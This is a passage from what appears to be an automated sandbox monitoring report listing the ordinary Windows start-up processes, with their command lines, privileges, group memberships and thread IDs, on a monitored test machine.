"\\SystemRoot\\System32\\smss.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 173 os_tid = 0xe4 Thread: id = 174 os_tid = 0xe8 Thread: id = 195 os_tid = 0x120 Thread: id = 208 os_tid = 0x164 Process: id = "17" image_name = "autochk.exe" filename = "c:\\windows\\system32\\autochk.exe" page_root = "0x27656000" os_pid = "0xec" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0xe0" cmd_line = "\\??\\C:\\Windows\\system32\\autochk.exe *" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 178 os_tid = 0xf0 Process: id = "18" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x20fa5000" os_pid = "0x124" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000000 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 196 os_tid = 0x128 Process: id = "19" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x213c3000" os_pid = "0x12c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x124" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 198 os_tid = 0x130 Thread: id = 204 os_tid = 0x144 Thread: id = 205 os_tid = 0x148 Thread: id = 206 os_tid = 0x14c Thread: id = 207 os_tid = 0x150 Thread: id = 216 os_tid = 0x188 Thread: id = 221 os_tid = 0x198 Thread: id = 222 os_tid = 0x19c Thread: id = 227 os_tid = 0x1b8 Thread: id = 234 os_tid = 0x1d8 Process: id = "20" image_name = "smss.exe" filename = "c:\\windows\\system32\\smss.exe" page_root = "0x209ab000" os_pid = "0x154" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "16" os_parent_pid = "0xe0" cmd_line = "\\SystemRoot\\System32\\smss.exe 00000001 0000003c " cur_dir = "C:\\Windows\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 209 os_tid = 0x158 Process: id = "21" image_name = "wininit.exe" filename = "c:\\windows\\system32\\wininit.exe" page_root = "0x210c9000" os_pid = "0x15c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "18" os_parent_pid = "0x124" cmd_line = "wininit.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 210 os_tid = 0x160 Thread: id = 217 os_tid = 0x18c Thread: id = 218 os_tid = 0x190 Thread: id = 224 os_tid = 0x1a4 Thread: id = 225 os_tid = 0x1a8 Thread: id = 226 os_tid = 0x1b4 Thread: id = 239 os_tid = 0x1ec Thread: id = 290 os_tid = 0x2b4 Process: id = "22" image_name = "csrss.exe" filename = "c:\\windows\\system32\\csrss.exe" page_root = "0x1df66000" os_pid = "0x168" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x154" cmd_line = "%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 211 os_tid = 0x16c Thread: id = 212 os_tid = 0x170 Thread: id = 213 os_tid = 0x174 Thread: id = 214 os_tid = 0x178 Thread: id = 215 os_tid = 0x17c Thread: id = 223 os_tid = 0x1a0 Thread: id = 247 os_tid = 0x204 Thread: id = 248 os_tid = 0x208 Process: id = "23" image_name = "winlogon.exe" filename = "c:\\windows\\system32\\winlogon.exe" page_root = "0x1dd6c000" os_pid = "0x180" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "20" os_parent_pid = "0x154" cmd_line = "winlogon.exe" cur_dir = "C:\\Windows\\system32" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 219 os_tid = 0x184 Thread: id = 231 os_tid = 0x1cc Thread: id = 232 os_tid = 0x1d0 Thread: id = 296 os_tid = 0x2c4 Thread: id = 308 os_tid = 0x300 Thread: id = 367 os_tid = 0x3f8 Thread: id = 368 os_tid = 0x64 Thread: id = 376 os_tid = 0x10c Process: id = "24" image_name = "services.exe" filename = "c:\\windows\\system32\\services.exe" page_root = "0x1dc87000" os_pid = "0x1ac" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x15c" cmd_line = "C:\\Windows\\system32\\services.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 228 os_tid = 0x1b0 Thread: id = 249 os_tid = 0x20c Thread: id = 250 os_tid = 0x210 Thread: id = 251 os_tid = 0x214 Thread: id = 252 os_tid = 0x218 Thread: id = 253 os_tid = 0x21c Thread: id = 254 os_tid = 0x220 Thread: id = 255 os_tid = 0x224 Thread: id = 256 os_tid = 0x228 Thread: id = 257 os_tid = 0x22c Thread: id = 258 os_tid = 0x230 Thread: id = 259 os_tid = 0x234 Thread: id = 274 os_tid = 0x270 Thread: id = 369 os_tid = 0x3fc Process: id = "25" image_name = "lsass.exe" filename = "c:\\windows\\system32\\lsass.exe" page_root = "0x1f192000" os_pid = "0x1bc" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x15c" cmd_line = "C:\\Windows\\system32\\lsass.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 229 os_tid = 0x1c0 Thread: id = 233 os_tid = 0x1d4 Thread: id = 235 os_tid = 0x1dc Thread: id = 236 os_tid = 0x1e0 Thread: id = 237 os_tid = 0x1e4 Thread: id = 240 os_tid = 0x1e8 Thread: id = 241 os_tid = 0x1f0 Thread: id = 243 os_tid = 0x1f4 Thread: id = 244 os_tid = 0x1f8 Thread: id = 245 os_tid = 0x1fc Thread: id = 246 os_tid = 0x200 Thread: id = 317 os_tid = 0x31c Thread: id = 375 os_tid = 0x100 Thread: id = 399 os_tid = 0x390 Process: id = "26" image_name = "lsm.exe" filename = "c:\\windows\\system32\\lsm.exe" page_root = "0x1e799000" os_pid = "0x1c4" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "21" os_parent_pid = "0x15c" cmd_line = "C:\\Windows\\system32\\lsm.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 230 os_tid = 0x1c8 Thread: id = 261 os_tid = 0x240 Thread: id = 292 os_tid = 0x2b8 Thread: id = 295 os_tid = 0x2c0 Thread: id = 297 os_tid = 0x2c8 Thread: id = 299 os_tid = 0x2d0 Thread: id = 302 os_tid = 0x2dc Thread: id = 303 os_tid = 0x2e0 Thread: id = 304 os_tid = 0x2e4 Thread: id = 306 os_tid = 0x2ec Process: id = "27" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1deb7000" os_pid = "0x238" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\system32\\svchost.exe -k DcomLaunch" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\DcomLaunch" [0xa], "NT SERVICE\\PlugPlay" [0xe], "NT SERVICE\\Power" [0xa], "NT AUTHORITY\\Logon Session 00000000:00007073" [0xc000000f], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 260 os_tid = 0x23c Thread: id = 262 os_tid = 0x244 Thread: id = 263 os_tid = 0x248 Thread: id = 264 os_tid = 0x24c Thread: id = 265 os_tid = 0x250 Thread: id = 266 os_tid = 0x254 Thread: id = 267 os_tid = 0x258 Thread: id = 268 os_tid = 0x25c Thread: id = 269 os_tid = 0x260 Thread: id = 271 os_tid = 0x264 Thread: id = 272 os_tid = 0x268 Thread: id = 273 os_tid = 0x26c Thread: id = 276 os_tid = 0x278 Thread: id = 278 os_tid = 0x284 Thread: id = 279 os_tid = 0x288 Thread: id = 281 os_tid = 0x290 Thread: id = 342 os_tid = 0x388 Process: id = "28" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1e6ed000" os_pid = "0x27c" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\system32\\svchost.exe -k RPCSS" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\RpcEptMapper" [0xe], "NT SERVICE\\RpcSs" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b6e4" [0xc000000f], "LOCAL" [0x7] Thread: id = 277 os_tid = 0x280 Thread: id = 280 os_tid = 0x28c Thread: id = 282 os_tid = 0x294 Thread: id = 283 os_tid = 0x298 Thread: id = 285 os_tid = 0x29c Thread: id = 286 os_tid = 0x2a0 Thread: id = 287 os_tid = 0x2a4 Thread: id = 288 os_tid = 0x2a8 Thread: id = 457 os_tid = 0x4cc Process: id = "29" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x1f1fa000" os_pid = "0x2ac" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xa], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b9cb" [0xc000000f], "LOCAL" [0x7] Thread: id = 291 os_tid = 0x2b0 Thread: id = 293 os_tid = 0x2bc Thread: id = 298 os_tid = 0x2cc Thread: id = 300 os_tid = 0x2d4 Thread: id = 301 os_tid = 0x2d8 Thread: id = 315 os_tid = 0x2f8 Thread: id = 316 os_tid = 0x2fc Thread: id = 324 os_tid = 0x33c Thread: id = 328 os_tid = 0x34c Thread: id = 329 os_tid = 0x350 Thread: id = 330 os_tid = 0x354 Thread: id = 343 os_tid = 0x38c Thread: id = 344 os_tid = 0x390 Thread: id = 345 os_tid = 0x394 Thread: id = 348 os_tid = 0x3a4 Thread: id = 349 os_tid = 0x3a8 Thread: id = 403 os_tid = 0xfc Thread: id = 416 os_tid = 0x428 Thread: id = 417 os_tid = 0x42c Thread: id = 420 os_tid = 0x43c Thread: id = 425 os_tid = 0x450 Thread: id = 426 os_tid = 0x454 Process: id = "30" image_name = "logonui.exe" filename = "c:\\windows\\system32\\logonui.exe" page_root = "0x1d6c0000" os_pid = "0x2f0" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0x180" cmd_line = "\"LogonUI.exe\" /flags:0x0" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "BUILTIN\\Administrators" [0xe], "Everyone" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7] Thread: id = 307 os_tid = 0x2f4 Thread: id = 309 os_tid = 0x304 Thread: id = 310 os_tid = 0x308 Thread: id = 311 os_tid = 0x30c Thread: id = 312 os_tid = 0x314 Thread: id = 313 os_tid = 0x318 Thread: id = 318 os_tid = 0x320 Thread: id = 319 os_tid = 0x324 Thread: id = 320 os_tid = 0x328 Thread: id = 321 os_tid = 0x32c Process: id = "31" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3d004000" os_pid = "0x330" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\AudioEndpointBuilder" [0xe], "NT SERVICE\\CscService" [0xa], "NT SERVICE\\dot3svc" [0xa], "NT SERVICE\\hidserv" [0xa], "NT SERVICE\\HomeGroupListener" [0xa], "NT SERVICE\\IPBusEnum" [0xa], "NT SERVICE\\Netman" [0xa], "NT SERVICE\\PcaSvc" [0xa], "NT SERVICE\\StorSvc" [0xa], "NT SERVICE\\TabletInputService" [0xa], "NT SERVICE\\TrkWks" [0xa], "NT SERVICE\\UmRdpService" [0xa], "NT SERVICE\\UxSms" [0xa], "NT SERVICE\\WdiSystemHost" [0xa], "NT SERVICE\\Wlansvc" [0xa], "NT SERVICE\\WPDBusEnum" [0xa], "NT SERVICE\\wudfsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ce19" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 322 os_tid = 0x334 Thread: id = 323 os_tid = 0x338 Thread: id = 325 os_tid = 0x340 Thread: id = 326 os_tid = 0x344 Thread: id = 327 os_tid = 0x348 Thread: id = 332 os_tid = 0x360 Thread: id = 334 os_tid = 0x368 Thread: id = 335 os_tid = 0x36c Thread: id = 336 os_tid = 0x370 Thread: id = 338 os_tid = 0x378 Thread: id = 353 os_tid = 0x3b8 Thread: id = 355 os_tid = 0x3c0 Thread: id = 358 os_tid = 0x3d0 Thread: id = 360 os_tid = 0x3d8 Thread: id = 362 os_tid = 0x3e0 Thread: id = 363 os_tid = 0x3e4 Thread: id = 370 os_tid = 0xcc Thread: id = 371 os_tid = 0xc8 Thread: id = 394 os_tid = 0x278 Thread: id = 396 os_tid = 0x2e8 Thread: id = 402 os_tid = 0x10c Thread: id = 404 os_tid = 0x134 Process: id = "32" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3d409000" os_pid = "0x358" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d178" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 331 os_tid = 0x35c Thread: id = 333 os_tid = 0x364 Thread: id = 337 os_tid = 0x374 Thread: id = 339 os_tid = 0x37c Thread: id = 340 os_tid = 0x380 Thread: id = 341 os_tid = 0x384 Thread: id = 354 os_tid = 0x3bc Thread: id = 356 os_tid = 0x3c4 Thread: id = 359 os_tid = 0x3d4 Thread: id = 361 os_tid = 0x3dc Thread: id = 364 os_tid = 0x3e8 Thread: id = 378 os_tid = 0x108 Thread: id = 380 os_tid = 0xf8 Thread: id = 381 os_tid = 0x134 Thread: id = 389 os_tid = 0x154 Thread: id = 391 os_tid = 0x1f8 Thread: id = 406 os_tid = 0x278 Thread: id = 433 os_tid = 0x470 Thread: id = 435 os_tid = 0x478 Thread: id = 436 os_tid = 0x47c Thread: id = 441 os_tid = 0x158 Thread: id = 443 os_tid = 0x480 Thread: id = 453 os_tid = 0x4c0 Process: id = "33" image_name = "audiodg.exe" filename = "c:\\windows\\system32\\audiodg.exe" page_root = "0x3cc13000" os_pid = "0x398" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "29" os_parent_pid = "0x2ac" cmd_line = "C:\\Windows\\system32\\AUDIODG.EXE 0x2d4" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\Audiosrv" [0xe], "NT SERVICE\\Dhcp" [0xa], "NT SERVICE\\eventlog" [0xe], "NT SERVICE\\HomeGroupProvider" [0xa], "NT SERVICE\\lmhosts" [0xa], "NT SERVICE\\WPCSvc" [0xa], "NT SERVICE\\wscsvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000b9cb" [0xc000000f], "LOCAL" [0x7] Thread: id = 346 os_tid = 0x39c Thread: id = 347 os_tid = 0x3a0 Thread: id = 350 os_tid = 0x3ac Thread: id = 351 os_tid = 0x3b0 Thread: id = 352 os_tid = 0x3b4 Process: id = "34" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x3d719000" os_pid = "0x3ec" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\EventSystem" [0xe], "NT SERVICE\\fdPHost" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xa], "NT SERVICE\\sppuinotify" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\THREADORDER" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000e0e0" [0xc000000f], "LOCAL" [0x7] Thread: id = 365 os_tid = 0x3f0 Thread: id = 366 os_tid = 0x3f4 Thread: id = 372 os_tid = 0xf0 Thread: id = 373 os_tid = 0xec Thread: id = 374 os_tid = 0xfc Thread: id = 377 os_tid = 0x110 Thread: id = 379 os_tid = 0x104 Thread: id = 413 os_tid = 0x418 Process: id = "35" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x14760000" os_pid = "0x138" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "child_process" parent_id = "27" os_parent_pid = "0x238" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000d178" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 382 os_tid = 0x13c Thread: id = 383 os_tid = 0x130 Thread: id = 384 os_tid = 0x128 Thread: id = 385 os_tid = 0x124 Thread: id = 386 os_tid = 0x140 Thread: id = 387 os_tid = 0x16c Thread: id = 388 os_tid = 0x158 Process: id = "36" image_name = "userinit.exe" filename = "c:\\windows\\system32\\userinit.exe" page_root = "0x14a84000" os_pid = "0x1c0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "23" os_parent_pid = "0x180" cmd_line = "C:\\Windows\\system32\\userinit.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7c5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 392 os_tid = 0x1fc Process: id = "37" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x169d7000" os_pid = "0x1f4" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "36" os_parent_pid = "0x1c0" cmd_line = "C:\\Windows\\Explorer.EXE" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7c5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 393 os_tid = 0x24c Thread: id = 395 os_tid = 0x298 Thread: id = 400 os_tid = 0x3bc Thread: id = 407 os_tid = 0x404 Thread: id = 408 os_tid = 0x408 Thread: id = 409 os_tid = 0x40c Thread: id = 414 os_tid = 0x420 Thread: id = 415 os_tid = 0x424 Thread: id = 427 os_tid = 0x458 Thread: id = 428 os_tid = 0x45c Thread: id = 437 os_tid = 0x484 Thread: id = 438 os_tid = 0x488 Thread: id = 440 os_tid = 0x48c Thread: id = 442 os_tid = 0x490 Thread: id = 444 os_tid = 0x494 Thread: id = 445 os_tid = 0x498 Thread: id = 446 os_tid = 0x49c Thread: id = 447 os_tid = 0x4a0 Thread: id = 448 os_tid = 0x4a4 Thread: id = 449 os_tid = 0x4b8 Thread: id = 450 os_tid = 0x4bc Thread: id = 454 os_tid = 0x4c4 Thread: id = 455 os_tid = 0x4c8 Thread: id = 456 os_tid = 0x4d0 Process: id = "38" image_name = "dwm.exe" filename = "c:\\windows\\system32\\dwm.exe" page_root = "0x13b7a000" os_pid = "0x360" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "31" os_parent_pid = "0x330" cmd_line = "\"C:\\Windows\\system32\\Dwm.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e7c5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 398 os_tid = 0x38c Thread: id = 405 os_tid = 0x390 Thread: id = 410 os_tid = 0x3f8 Thread: id = 411 os_tid = 0x410 Thread: id = 412 os_tid = 0x414 Process: id = "39" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x10535000" os_pid = "0x430" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "24" os_parent_pid = "0x1ac" cmd_line = "C:\\Windows\\system32\\svchost.exe -k NetworkService" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\Network Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\CryptSvc" [0xa], "NT SERVICE\\Dnscache" [0xe], "NT SERVICE\\LanmanWorkstation" [0xa], "NT SERVICE\\napagent" [0xa], "NT SERVICE\\NlaSvc" [0xa], "NT SERVICE\\TapiSrv" [0xa], "NT SERVICE\\TermService" [0xa], "NT SERVICE\\Wecsvc" [0xa], "NT SERVICE\\WinRM" [0xa], "NT AUTHORITY\\Logon Session 00000000:000109f0" [0xc000000f], "LOCAL" [0x7] Thread: id = 418 os_tid = 0x434 Thread: id = 419 os_tid = 0x438 Thread: id = 421 os_tid = 0x440 Thread: id = 422 os_tid = 0x444 Thread: id = 423 